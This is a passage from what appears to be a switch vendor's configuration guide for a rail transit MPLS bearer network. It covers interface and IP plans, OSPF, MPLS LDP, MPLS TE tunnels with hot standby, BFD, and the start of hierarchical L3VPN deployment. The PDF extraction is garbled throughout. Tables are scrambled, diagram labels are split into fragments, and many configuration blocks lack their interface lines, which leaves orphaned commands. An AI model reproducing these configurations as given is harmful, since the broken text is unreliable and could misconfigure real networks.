XGE0/0/1 XGE0/0/1
XGE0/0/4
XGE0/0/4
XGE0/0/2.150 XGE0/0/2.150
CE2
vpna
Interface data plan

Table 2-15 and Table 2-16 list Eth-Trunks, local interfaces, and IP addresses of local
interfaces on devices.

Table 2-15 Eth-Trunks

Device Role Interface Number Member Interface
Core_SPE1 Eth-Trunk4 XGigabitEthernet5/0/4

XGigabitEthernet5/0/5
Eth-Trunk5 XGigabitEthernet1/0/0



Device Role Interface Number Member Interface
Site1_UPE1 Eth-Trunk17 XGigabitEthernet1/0/0

Site1_UPE2 Eth-Trunk17 XGigabitEthernet6/0/0

Table 2-16 Local Interfaces and IP Addresses

Device Role Local Interface IP Address Interface
Description
Core_SPE1 LoopBack1 172.16.0.5/32 -
Eth-Trunk4 172.17.4.8/31 Core_SPE1 to

Core_SPE2

Core_SPE3

Site1_UPE1
XGigabitEthernet6/0/ 172.17.10.2/31 Core_SPE1 to

4 Site3_UPE6

Core_SPE1

Core_SPE3


Description

Site1_UPE2

5 Site2_UPE3

Core_SPE1

Core_SPE2

1 Site3_UPE5

3 Site2_UPE4
Site1_UPE1 LoopBack1 172.16.2.51/32 -
Eth-Trunk17 172.17.4.11/31 Site1_UPE1 to

Core_SPE1

Site1_UPE2
XGigabitEthernet1/0/ 172.18.200.66/26 Site1_UPE1 to CE1

4.200

Core_SPE2

Site1_UPE1

4.200
XGigabitEthernet0/0/ 172.16.8.179/31 Site2_UPE3 to

1 Core_SPE2

4 Site2_UPE4

2.150


Description

1 Core_SPE3

4 Site2_UPE3

2.150

4 Core_SPE3

1 Site3_UPE6

2.100

4 Core_SPE1

1 Site3_UPE5

2.100
2.5.2.2 Configuring Device Information
Data Plan
NOTE
The data provided in this section is used as an example, which may vary depending on the network scale
and topology.
Configure device information on all devices based on the network topology.
Device information includes the site name, device role, and device number. Each device is
named in the format of AA_BBX.
l AA: indicates the site name, such as Core and Site1.

l BB: indicates the device role, such as SPE, UPE, and CE.
l X: indicates the device number, starting from 1.
For example, Site1_UPE1 indicates a UPE numbered 1 at site 1. The following table
describes the data plan.

Parameter Value Description
sysname Site1_UPE1 Device name.
Procedure
l Configure the device name.
The following uses the configuration of Site1_UPE1 as an example. The configurations
of other devices are similar to the configuration of Site1_UPE1, and are not mentioned
here.
sysname Site1_UPE1
----End
2.5.2.3 Configuring Interfaces
Procedure
Step 1 Add physical interfaces to Eth-Trunks.
The following uses the configuration of Core_SPE1 as an example. The configurations of
other devices are similar to the configuration of Core_SPE1, and are not mentioned here.
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 5
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 4
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#
eth-trunk 17
#

Step 2 Configure descriptions and IP addresses for interfaces.

The following uses the configuration of Core_SPE1 as an example. The configurations of
other devices are similar to the configuration of Core_SPE1, and are not mentioned here.
#
undo portswitch
description Core_SPE1 to Core_SPE2
ip address 172.17.4.8 255.255.255.254
#
undo portswitch
ip address 172.17.4.2 255.255.255.254
#
undo portswitch
description Core_SPE1 to Site1_UPE1
ip address 172.17.4.10 255.255.255.254
#
undo portswitch
ip address 172.17.10.2 255.255.255.254
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.0.5 255.255.255.255
#
Step 3 Configure Eth-Trunks to function as 40GE interfaces.

Run the least active-linknumber 4 command on Eth-Trunks of all S9700 switches to
configure the Eth-Trunks to function as 40GE interfaces. If a member interface of an Eth-
Trunk goes Down, the Eth-Trunk goes Down. The following uses the configuration of
Core_SPE1 as an example. The configurations of other devices are similar to the
configuration of Core_SPE1, and are not mentioned here.
#
least active-linknumber 4
#
#
#
Step 4 Create Eth-Trunk load balancing profiles and apply the profiles to Eth-Trunks.
Configure load balancing based on the source and destination port numbers. The following
uses the configuration of Core_SPE1 as an example. The configurations of other devices are
similar to the configuration of Core_SPE1, and are not mentioned here.
#
load-balance-profile CUSTOM
ipv6 field l4-sport l4-dport
#
load-balance enhanced profile CUSTOM
#
#

#
Step 5 Disable STP globally.
All devices on the entire network are connected through Layer 3 interfaces, and Layer 2 loop
prevention protocols are not required. Therefore, disable STP globally. The following uses the
configuration of Core_SPE1 as an example. The configurations of other devices are similar to
the configuration of Core_SPE1, and are not mentioned here.
#
stp disable
#
----End
2.5.2.4 Enabling BFD
Context
To implement protection switching within 50 ms, set the minimum interval at which BFD
packets are sent and received to 3.3 ms. The restraints on switches are as follows:
l For the S12700, the MPU must be an ET1D2MPUA000 card.
l For the S7700 or S9700, the MPU must have an ES0D00FSUA00 card installed or be an
EH1D2SRUDC00/EH1D2SRUDC01 card.
l For the S7706 or S7712, the assign system-resource-mode static command must be run
to set the resource allocation mode to static so that the BFD detection duration can be
controlled within 50 ms.
l For the S5720HI, the set service-mode enhanced command must be run to configure the
switch to work in enhanced mode.
Procedure
l Configure SPEs.
The following uses the configuration of Core_SPE1 on the core ring as an example. The
configurations of Core_SPE2 and Core_SPE3 are similar to the configuration of
Core_SPE1, and are not mentioned here.
#
bfd
#
l Configure UPEs.

of Site1_UPE2, Site2_UPE3, Site2_UPE4, Site3_UPE5, and Site3_UPE6 are similar to
the configuration of Site1_UPE1, and are not mentioned here.
#
bfd
#
----End

2.5.3 Deploying OSPF

Use OSPF as an IGP to ensure that network-wide devices can be reached through routes and
set up MPLS LDP and MPLS TE over OSPF routes.
2.5.3.1 Configuration Roadmap
Figure 2-16 OSPF neighbor relationship diagram

CE1 CE3
vpna vpna
OS Core_SPE1
PF PF
OS
PF
OS
OS
PF
PF
OS
OS
OS
PF
PF
PF
OS
OSPF
Core_SPE2 Core_SPE3
OSPF
OSPF
OSPF
CE2 OSPF
vpna
Use OSPF as an IGP to ensure that network-wide devices can be reached through routes and
set up MPLS LDP and MPLS TE over OSPF routes. The configuration roadmap is as follows:
1. Add all devices to area 0 and advertise the directly connected network segment and the
address of loopback interface 1.
2. Configure all interfaces that do not run OSPF as OSPF silent interfaces to disable the
interfaces from sending or receiving OSPF packets. The configuration makes the OSPF
network more adaptive and saves network resources.
3. Considering the impact of 31-bit subnet masks, configure the OSPF network type to
point-to-point on the main interconnection interface.
4. Configure synchronization between OSPF and LDP to prevent traffic loss caused by
switchovers of the primary and backup LSPs.
2.5.3.2 Deploying OSPF

Context
Configuring OSPF ensures that user-end provider edges (UPEs) and superstratum provider
edges (SPEs) can be reached through public network routes.
Procedure
l Configure SPEs.
router id 172.16.0.5 //Configure a router ID.
#
ospf network-type p2p //Set the OSPF network type to P2P on the interfaces
using IP addresses with 31-bit subnet masks.
#
ospf network-type p2p
#
#
#
ospf 1
silent-interface all //Prohibit all interfaces from receiving and sending
OSPF packets.
undo silent-interface Eth-Trunk4 //Allow interfaces to receive and send
OSPF packets.
undo silent-interface Eth-Trunk5
undo silent-interface XGigabitEthernet6/0/4
spf-schedule-interval millisecond 10 //Set the route calculation interval
to 10 ms to speed up route convergence.
lsa-originate-interval 0 //Set the LSA update interval to 0.
lsa-arrival-interval 0 //Set the interval for receiving LSAs to 0 so that
topology or route changes can be immediately detected to speed up route
convergence.
graceful-restart period 600 //Enable OSPF GR.
flooding-control //Enable flooding-control to stabilize neighbor
relationships.
area 0.0.0.0
authentication-mode md5 1 cipher %^
%#NInJJ<oF9VXb:BS~~9+JT'suROXkVHNG@8+*3FyB%^%# //Set the authentication
mode and password for the OSPF area.
network 172.16.0.5 0.0.0.0
network 172.17.4.2 0.0.0.0
network 172.17.4.8 0.0.0.0
network 172.17.4.10 0.0.0.0
network 172.17.10.2 0.0.0.0
#
l Configure UPEs.
router id 172.16.2.51
#
#

#
ospf 1
silent-interface all
graceful-restart period 600
bandwidth-reference 100000 //Set the bandwidth reference value used by the
system to calculate the interface cost based on a formula.
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#nU!dUe#c'J!;/
%*WtZxQ<gP:'zx_E2OQnML]q;s#%^%#
network 172.16.2.51 0.0.0.0
network 172.17.4.11 0.0.0.0
network 172.17.4.14 0.0.0.0
#
----End
Checking the Configuration

l Run the display ospf peer command to check OSPF neighbor information. Using
Core_SPE1 as an example, if the value of State is Full, OSPF neighbor relationships
have set up successfully.
[Core_SPE1]display ospf peer

Neighbors
Area 0.0.0.0 interface 172.17.4.8(Eth-Trunk4)'s neighbors

Router ID: 172.16.0.3 Address: 172.17.4.9 GR State: Normal
DR: None BDR: None MTU: 0
Neighbors

Neighbors

Neighbors
Area 0.0.0.0 interface 172.17.10.2(XGigabitEthernet6/0/4)'s neighbors



2.5.4 Deploying MPLS LDP

When MPLS LDP is deployed on a network, LDP LSPs can be set up to bear services.
Figure 2-17 MPLS LDP topology

CE1 CE3
vpna vpna
Core_SPE1
4 7
5
8
1
6 9
3
Core_SPE2 Core_SPE3
10
12
11
CE2 LDP LSP

vpna
1. Configure an LSR ID and enable MPLS LDP globally and on each interface.
2. Configure synchronization between LDP and OSPF to prevent traffic loss caused by
switchovers of the primary and backup LSPs.
3. Configure LDP GR so that traffic forwarding is not interrupted upon primary/backup
switchovers and protocol restarts.
4. Configure BFD for LSP to quickly detect LDP LSP faults on the core ring.
2.5.4.2 Data Plan

NOTE
The data provided in this section is used as an example, which may vary depending on the network scale and
topology.
Plan data before configuring MPLS LDP.
Table 2-17 MPLS parameters

Parameter Value Remarks
mpls lsr-id IP address of LSR loopback Configure LSR IDs before

interface 1 running MPLS commands.
label advertise non-null Disable penultimate hop

popping (PHP) because it
affects switchover
performance.
bfd bind ldp-lsp discriminator local Configure static BFD for

discriminator remote LDP LSPs.
detect-multiplier Set the local discriminator
of the local system to be the
min-tx-interval same as the remote
min-rx-interval discriminator of the remote
process-pst system, and adjust the local
detection multiplier of BFD.
Set the minimum interval at
which BFD packets are sent
and received to 3.3 ms.
Allow BFD sessions to
change the port status table
(PST) to speed up
switchovers.
2.5.4.3 Enabling MPLS LDP
Procedure
l Configure SPEs.
mpls lsr-id 172.16.0.5 //Configure an MPLS LSR ID. The IP address of a
loopback interface is recommended.
mpls //Enable MPLS globally.
label advertise non-null //Disable PHP so that the egress node assigns
labels to the penultimate hop properly.
#
mpls ldp //Enable MPLS LDP globally.
#
mpls
mpls ldp //Enable MPLS LDP on an interface.

#
mpls
#
mpls
#
mpls
#
l Configure UPEs.
mpls lsr-id 172.16.2.51 //Configure an MPLS LSR ID. The IP address of a
loopback interface is recommended.
mpls //Enable MPLS globally.
label advertise non-null //Disable PHP so that the egress node assigns
labels to the penultimate hop properly.
#
mpls ldp //Enable MPLS LDP globally.
#
mpls
#
mpls
#
----End

l Run the display mpls ldp session all command to view the MPLS LDP session status.
Using Core_SPE1 as an example, if the value of Status is Operational, an MPLS LDP
session has been set up successfully.
[Core_SPE1]display mpls ldp session all
LDP Session(s) in Public Network

Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.
------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv
------------------------------------------------------------------------------
172.16.0.3:0 Operational DU Passive 0000:00:56 226/226
172.16.0.4:0 Operational DU Active 0000:00:56 226/226
------------------------------------------------------------------------------
TOTAL: 4 session(s) Found.

2.5.4.4 Configuring Synchronization Between LDP and OSPF
Context
LDP LSRs set up LSPs using OSPF. When an LDP session fault (non-link fault) occurs on the
primary LSP or the primary LSP recovers from a fault, synchronization between LDP and
OSPF can prevent traffic loss caused by switchovers of the primary and backup LSPs.
Procedure
l Configure SPEs.
ospf ldp-sync //Enable synchronization between LDP and OSPF on the
protected interface.
ospf timer ldp-sync hold-down 20 //Set a Hold-down time that an interface
uses to delay setting up an OSPF neighbor relationship until an LDP session
is set up.
#
ospf ldp-sync
ospf timer ldp-sync hold-down 20
#
ospf ldp-sync
#
ospf ldp-sync
#
l Configure UPEs.

ospf ldp-sync
#
ospf ldp-sync
#
----End
2.5.4.5 Configuring LDP GR
Context
LDP GR can be configured so that traffic forwarding is not interrupted upon primary/backup
switchovers and protocol restarts.

Procedure
l Configure SPEs.
mpls ldp
graceful-restart //Enable LDP GR.
#
l Configure UPEs.
mpls ldp
graceful-restart
#
----End
2.5.4.6 Configuring BFD for LSP
Context
To ensure reliability of LDP LSPs between SPEs on the core ring, configure BFD to detect
LDP LSPs quickly.
Procedure
l Configure SPEs.
bfd SPE1toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.9 interface
Eth-Trunk4 //Enable static BFD to detect the LDP LSP between SPE1 and SPE2.
discriminator local 317 //Set the local discriminator. The local
discriminator of the local system must be the same as the remote
discriminator of the remote system.
discriminator remote 137 //Set the remote discriminator.
detect-multiplier 8 //Set the local detection multiplier of BFD.
min-tx-interval 3 //Set the minimum interval at which the local device
sends BFD packets to 3.3 ms.
min-rx-interval 3 //Set the minimum interval at which the local device
receives BFD packets to 3.3 ms.
process-pst //Allow BFD sessions to change the PST to speed up switchovers.
commit //Commit the BFD session configuration.
#
bfd SPE1toSPE3 bind ldp-lsp peer-ip 172.16.0.4 nexthop 172.17.4.3 interface
Eth-Trunk5 //Enable static BFD to detect the LDP LSP between SPE1 and SPE3.
discriminator local 32
discriminator remote 23
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
----End


l Run the display bfd session all for-lsp command to check the BFD for LSP session
status. Using Core_SPE1 as an example, if BFD sessions with the tunnel type being
S_LDP_LSP are all in Up state, BFD for LSP sessions have been set up successfully.
[Core_SPE1]display bfd session all for-lsp
------------------------------------------------------------------------------
--
Local Remote PeerIpAddr State Type
InterfaceName
------------------------------------------------------------------------------
--
32 23 172.16.0.4 Up S_LDP_LSP Eth-
Trunk4
317 137 172.16.0.3 Up S_LDP_LSP Eth-
Trunk5
------------------------------------------------------------------------------
--
Total UP/DOWN Session Number : 2/0
2.5.5 Deploying MPLS TE

When MPLS TE is deployed on a network, TE tunnels can be set up to bear services.
Figure 2-18 MPLS TE topology
Core_SPE2 Core_SPE3
Primary TE1
Primary TE3
2 Ba
3 1 TE ck
up 5 7
k up TE
B ac 4
6
2
Site2_UPE3 4 Site2_UPE4
8
Primary path of a TE tunnel

Backup path of a TE tunnel
Dashed lines in the same color indicate the
primary and backup paths of a TE tunnel.
Pipes indicate primary and backup TE tunnels
of L3VPN services.
1. Enable MPLS TE.

2. Globally enable MPLS, MPLS TE and MPLS TE CSPF on each node along TE tunnels,
and deploy MPLS and MPLS TE on each interface along the TE tunnels.
3. Configure tunnel paths, enable each node to use primary and backup TE tunnels, and
configure primary and backup CR-LSPs using the affinity attribute.
4. Create L3VPN service tunnels.
a. Create primary tunnels.
n Create primary tunnel TE1 between Site2_UPE3 and Core_SPE2. Specify path
1 as the primary CR-LSP and path 2 as the backup CR-LSP.
n Create primary tunnel TE3 between Site2_UPE4 and Core_SPE3. Specify path
5 as the primary CR-LSP and path 6 as the backup CR-LSP.
b. Create backup tunnels.
n Create backup tunnel TE2 between Site2_UPE3 and Core_SPE3, which is the
backup tunnel of primary tunnel TE1. Specify path 3 as the primary CR-LSP
and path 4 as the backup CR-LSP.
n Create backup tunnel TE4 between Site2_UPE4 and Core_SPE2, which is the
backup tunnel of primary tunnel TE3. Specify path 7 as the primary CR-LSP
and path 8 as the backup CR-LSP.
c. Configure RSVP GR.
Enable RSVP GR on all devices to prevent network disconnection and recover
dynamic CR-LSPs upon switchovers on RSVP nodes.
d. Configure BFD for CR-LSP.
Configure static BFD for CR-LSP on all devices to speed up switchovers of the
primary and backup CR-LSPs.
5. Create a tunnel policy.
Configure TE tunnels to be preferentially selected.
2.5.5.2 Data Plan
NOTE
topology.
Table 2-18 MPLS parameters
mpls te - Enable MPLS TE.
mpls rsvp-te - Enable MPLS RSVP-TE.
mpls rsvp-te hello - Enable the RSVP Hello

extension mechanism.
mpls rsvp-te hello full-gr - Enable the RSVP GR and

RSVP GR Helper
capabilities of the GR node.

mpls te cspf - Enable the MPLS TE CSPF

algorithm.
Table 2-19 MPLS TE tunnel parameters

interface Tunnel Number of a tunnel It is recommended that

interface tunnel IDs be associated
with device names and
descriptions be added for
tunnel interfaces.
ip address unnumbered interface LoopBack1 Configure a tunnel interface

to borrow an IP address from
loopback interface 1.
tunnel-protocol mpls te Enable the TE tunnel

function.
destination IP address of remote Specify the destination IP

loopback interface 1 address.
mpls te tunnel-id Tunnel ID Set a tunnel ID.
mpls te affinity property Configure the affinity -

attribute for the primary and
backup CR-LSPs based on
link management group
attributes.
mpls te backup hot-standby Configure the hot standby

mode of the tunnel.
bfd bind mpls-te interface discriminator local Configure static BFD to

Tunnel te-lsp discriminator remote detect the backup CR-LSP
of a TE tunnel.
detect-multiplier
Set the local discriminator of
min-tx-interval the local system to be the
min-rx-interval same as the remote
process-pst discriminator of the remote
system, and adjust the local
change the PST to speed up
switchovers.

bfd bind mpls-te interface discriminator local Configure static BFD to

Tunnel discriminator remote detect the primary CR-LSP
of a TE tunnel.
detect-multiplier
Set the local discriminator of
min-tx-interval the local system to be the
min-rx-interval same as the remote
process-pst discriminator of the remote
system, and adjust the local
change the PST to speed up
switchovers.
tunnel-policy Tunnel policy name: TSel Configure tunnel policies for

tunnel select-seq cr-lsp lsp preferentially selecting CR-
load-balance-number 1 LSPs.
Tunnel policy on the core
device: TE
tunnel select-seq cr-lsp
load-balance-number 1
Table 2-20 MPLS TE tunnel list

Tunnel Tunnel Interface Tunnel ID
Core_SPE1 to Site1_UPE1 Tunnel611 71

Site1_UPE1 to Core_SPE1






Tunnel Tunnel Interface Tunnel ID






2.5.5.3 Configuring MPLS TE Tunnels and Hot Standby
Procedure
l Configure SPEs.
mpls
mpls te //Enable MPLS TE globally.
mpls rsvp-te //Enable RSVP-TE.
mpls te cspf //Enable the CSPF algorithm.
#
mpls te //Enable MPLS TE on an interface.
mpls te link administrative group c //Configure the link management group
attribute for the TE tunnel to select primary and backup paths.
mpls rsvp-te //Enable RSVP-TE on an interface.
#
mpls te
mpls te link administrative group 30
mpls rsvp-te
#
mpls te
mpls rsvp-te
#
mpls te
mpls rsvp-te
#
ospf 1
opaque-capability enable //Enable the Opaque capability of OSPF.

area 0.0.0.0
mpls-te enable //Enable MPLS TE in the OSPF area.
#
interface Tunnel611 //Specify the tunnel from Core_SPE1 to Site1_UPE1.
description Core_SPE1 to Site1_UPE1 //Configure the interface description.
ip address unnumbered interface LoopBack1 //Configure a tunnel interface
to borrow the IP address of a loopback interface.
tunnel-protocol mpls te //Set the tunnel protocol to MPLS TE.
destination 172.16.2.51 ////Configure IP address of Site1_UPE1 as the
tunnel destination IP address.
mpls te tunnel-id 71 //Configure a tunnel ID, which must be valid and
unique on the local device.
mpls te record-route //Configure the tunnel to record detailed route
information for maintenance.
mpls te affinity property 4 mask 4 //Configure the affinity attribute of
the primary CR-LSP for selecting the optimal forwarding path.
mpls te affinity property 8 mask 8 secondary //Configure the affinity
attribute of the backup CR-LSP.
mpls te backup hot-standby //Configure the hot standby mode of tunnels.
mpls te commit //Commit all the MPLS TE configuration of the tunnel for
the configuration to take effect.
#
interface Tunnel622
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.50
mpls te tunnel-id 82
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel711
mpls te commit
#
interface Tunnel721
mpls te commit
#
tunnel-policy TSel //Configure a tunnel policy.
tunnel select-seq cr-lsp lsp load-balance-number 1 //Configure the CR-LSP
to be preferentially selected.
#
tunnel-policy TE
tunnel select-seq cr-lsp load-balance-number 1
#
l Configure UPEs.


mpls
mpls te //Enable MPLS TE globally.
mpls rsvp-te //Enable RSVP-TE.
mpls te cspf //Enable the CSPF algorithm.
#
mpls te //Enable MPLS TE on an interface.
mpls te link administrative group c //Configure the link management group
attribute for the TE tunnel to select primary and backup paths.
mpls rsvp-te //Enable RSVP-TE on an interface.
#
mpls te
mpls rsvp-te
#
ospf 1
opaque-capability enable //Enable the Opaque capability of OSPF.
area 0.0.0.0
mpls-te enable //Enable MPLS TE in the OSPF area.
#
interface Tunnel611 //Specify the tunnel from Site1_UPE1 to Core_SPE1.
description Site1_UPE1 to Core_SPE1 //Configure the interface description.
ip address unnumbered interface LoopBack1 //Configure a tunnel interface
to borrow the IP address of a loopback interface.
tunnel-protocol mpls te //Set the tunnel protocol to MPLS TE.
destination 172.16.0.5 ////Configure IP address of Core_SPE1 as the tunnel
destination IP address.
mpls te tunnel-id 71 //Configure a tunnel ID, which must be valid and
unique on the local device.
mpls te record-route //Configure the tunnel to record detailed route
information for maintenance.
mpls te affinity property 4 mask 4 //Configure the affinity attribute of
the primary CR-LSP for selecting the optimal forwarding path.
mpls te affinity property 8 mask 8 secondary //Configure the affinity
attribute of the backup CR-LSP.
mpls te backup hot-standby //Configure the hot standby mode of tunnels.
mpls te commit //Commit all the MPLS TE configuration of the tunnel for
the configuration to take effect.
#
interface Tunnel612
description Site1_UPE1 to Core_SPE2
mpls te commit
#
tunnel-policy TSel //Configure a tunnel policy.
tunnel select-seq cr-lsp lsp load-balance-number 1 //Configure the CR-LSP
to be preferentially selected.
#
----End

l Run the display mpls te tunnel-interface Tunnel command to check local tunnel
interface information.

Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, if both the primary
and backup LSPs of tunnel 611 are in UP state, the primary and backup LSPs have been
set up successfully.
[Core_SPE1]display mpls te tunnel-interface Tunnel611
----------------------------------------------------------------
Tunnel611
----------------------------------------------------------------
Tunnel State Desc : UP
Active LSP : Primary LSP
Session ID : 71
Ingress LSR ID : 172.16.0.5 Egress LSR ID: 172.16.2.51
Admin State : UP Oper State : UP
Primary LSP State : UP
Main LSP State : READY LSP ID : 1
Hot-Standby LSP State : UP
Main LSP State : READY LSP ID : 32772
l Run the display mpls te hot-standby state all command to view status of all HSB
tunnels.
Using Core_SPE1 as an example, if all HSB tunnels of Core_SPE1 are in Primary LSP
state, traffic has been switched to primary CR-LSPs.
[Core_SPE1]display mpls te hot-standby state all
---------------------------------------------------------------------
No. tunnel name session id switch result
---------------------------------------------------------------------
1 Tunnel611 71 Primary LSP
l Run the ping lsp te tunnel command to check bidirectional connectivity of the master
and backup TE tunnels of each device.
Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, run the following ping
commands on both ends of the TE tunnel:
[Core_SPE1] ping lsp te Tunnel611
LSP PING FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 : 100 data bytes,
press CTRL_C to break
Reply from 172.16.2.51: bytes=100 Sequence=1 time=5 ms
--- FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 ping statistics ---
0.00% packet loss
[Core_SPE1] ping lsp te Tunnel611 hot-standby
LSP PING FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 : 100 data bytes,
press CTRL_C to break
--- FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 ping statistics ---
0.00% packet loss
l Run the tracert lsp te Tunnel command to detect LSPs.

Using tunnel 611 from Core_SPE1 to Site1_UPE1 as an example, ensure that the
primary and backup tunnel paths are different.
[Core_SPE1]tracert lsp te Tunnel611
LSP Trace Route FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 , press CTRL_C
to break.
TTL Replier Time Type Downstream
0 Ingress 172.17.4.11/[1078 ]
1 172.16.2.51 3 ms Egress
[Core_SPE1]tracert lsp te Tunnel611 hot-standby
LSP Trace Route FEC: TE TUNNEL IPV4 SESSION QUERY Tunnel611 , press CTRL_C
to break.
TTL Replier Time Type Downstream
0 Ingress 172.17.4.9/[1391 ]
1 172.17.4.9 3 ms Transit 172.17.4.13/[1169 ]
2 172.17.4.13 7 ms Transit 172.17.4.14/[1109 ]
3 172.16.2.51 4 ms Egress
2.5.5.4 Configuring RSVP GR
Procedure
l Configure SPEs.
mpls
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism globally.
mpls rsvp-te hello full-gr //Enable the RSVP GR and RSVP GR Helper
capabilities.
#
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism on an
interface.
#
mpls rsvp-te hello
#
mpls rsvp-te hello
#
mpls rsvp-te hello
#
l Configure UPEs.
mpls
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism globally.
mpls rsvp-te hello full-gr //Enable the RSVP GR and RSVP GR Helper
capabilities.
#
mpls rsvp-te hello //Enable the RSVP Hello extension mechanism on an
interface.
#
mpls rsvp-te hello
#
----End

2.5.5.5 Configuring BFD for CR-LSP
Procedure
l Configure SPEs.
bfd SPE1toUPE1_b bind mpls-te interface Tunnel611 te-lsp backup //Enable
static BFD to detect the backup CR-LSP of TE tunnel 611.
#
bfd SPE1toUPE1_m bind mpls-te interface Tunnel611 te-lsp //Enable static
BFD to detect the primary CR-LSP of TE tunnel 611.
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#

detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
l Configure UPEs.
bfd UPE1toSPE1_m_b bind mpls-te interface Tunnel611 te-lsp backup //Enable
#
bfd UPE1toSPE1_m bind mpls-te interface Tunnel611 te-lsp //Enable static
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_b bind mpls-te interface Tunnel612 te-lsp backup //Enable
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_m bind mpls-te interface Tunnel612 te-lsp //Enable static


detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
----End

l Run the display bfd session all for-te command to view the BFD session status.
Using Core_SPE1 as an example, if BFD sessions with the tunnel type being S_TE_LSP
are all in Up state, BFD sessions have been set up successfully.
[Core_SPE1]display bfd session all for-te
------------------------------------------------------------------------------
--
Local Remote PeerIpAddr State Type
InterfaceName
------------------------------------------------------------------------------
--
7112 7111 172.16.2.86 Up S_TE_LSP
Tunnel711
7212 7211 172.16.2.87 Up S_TE_LSP
Tunnel721
7216 7215 172.16.2.87 Up S_TE_LSP
Tunnel721
7116 7115 172.16.2.86 Up S_TE_LSP
Tunnel711
6226 6225 172.16.2.50 Up S_TE_LSP
Tunnel622
6116 6115 172.16.2.51 Up S_TE_LSP
Tunnel611
6112 6111 172.16.2.51 Up S_TE_LSP
Tunnel611
6222 6221 172.16.2.50 Up S_TE_LSP
Tunnel622
------------------------------------------------------------------------------
--
2.5.6 Deploying L3VPN Services and Protection (HoVPN)

This section describes how to deploy L3VPN services in HoVPN mode and use TE tunnels to
bear the services.
On a rail transmit bearer network, IP tunnels between nodes need to be enabled to bear
L3VPN services. For example, set up a hierarchical L3VPN tunnel from Site1_UPE1 to
Site2_UPE3 to transmit IP data services between Site1 and Site2, as shown in Figure 2-19.

Figure 2-19 Hierarchical L3VPN

Primary path for traffic of vpna
VPN FRR
CE1 CE3
Sp L3
vpna ec VP vpna
ific N
De rou
fau te
lt r
ou
te
Core_SPE1
VPN FRR
L3VPN
te
rou
L3
ific
N
VP
VP
ec
L3
Sp
N
Core_SPE2 Core_SPE3
Specific route VPN FRR
Default route
L3VPN
L3
L3VPN
VP
N
IP+VPN hybrid FRR
CE2
vpna

1. Deploy MP-BGP.
– Set up MP-IBGP peer relationships between UPEs and SPEs and between SPEs.
– Configure routing rules to enable traffic from UPEs to SPEs is forwarded through
the default route and traffic from SPEs to UPEs is forwarded through specific
routes.
– Configure route priority policies to enable UPEs to forward traffic to other sites
preferentially through SPEs directly connected to the UPEs.
– Configure route priority policies to enable SPEs to forward traffic to other sites
preferentially through UPEs directly connected to the SPEs.
– Configure route filtering policies to disable SPEs from advertising ARP Vlink
direct routes at the local sites to UPEs at other sites.
– Configure route filtering policies to disable SPEs from receiving route information
about sites directly connected to them from other SPEs, preventing route loops. For
example, disable Core_SPE2 from receiving routes of Site1 from Core_SPE1 and
routes of Site2 from Core_SPE3.
2. Deploy VPN services.
– Deploy VPN instances on UPEs and SPEs, and bind interfaces to the VPN instances
on UPEs, but not on SPEs.
– Preferentially use TE tunnels to bear VPN services on UPEs. In hybrid FRR mode,
LSP tunnels can be used to bear VPN services.

– Configure a tunnel policy selector on an SPE to enable the SPE to select any tunnel
policy when the next-hop address of a VPNv4 route has the prefix of another SPE
and to select a TE tunnel in other scenarios.
– Deploy VRRP on two UPEs at a site, and send information about ARP Vlink direct
routes to the neighboring SPEs so that the SPEs select the optimal route to send
packets to the CE.
3. Configure reliability protection.
– Deploy VRRP on two UPEs at a site to implement gateway backup and ensure
reliability of uplink traffic on CEs. Configure backup devices to forward service
traffic, minimizing the impact of VRRP switchovers on services.
– Deploy VPN FRR on a UPE. If the TE tunnel between the UPE and an SPE is
faulty, traffic is automatically switched to the TE tunnel between the UPE and
another SPE at the same site, minimizing the impact on VPN services.
– Deploy VPN FRR on an SPE, for example Core_SPE1. If Core_SPE2 connected to
SPE1 is faulty, Core_SPE1 switches VPN services to Core_SPE3, implementing
fast E2E switchovers of VPN services.
– Deploy VPN FRR on an SPE. If the TE tunnel between the SPE and a UPE is
faulty, traffic is automatically switched to the TE tunnel between the SPE and
another UPE at the same site, minimizing the impact on VPN services.
– Deploy IP+VPN hybrid FRR on UPEs. If the interface of a UPE detects a fault on
the link between the UPE and its connected CE, the UPE quickly switches traffic to
its peer UPE, and the peer UPE then forwards the traffic to the CE.
– Deploy VPN GR on all UPEs and SPEs to ensure uninterrupted VPN traffic
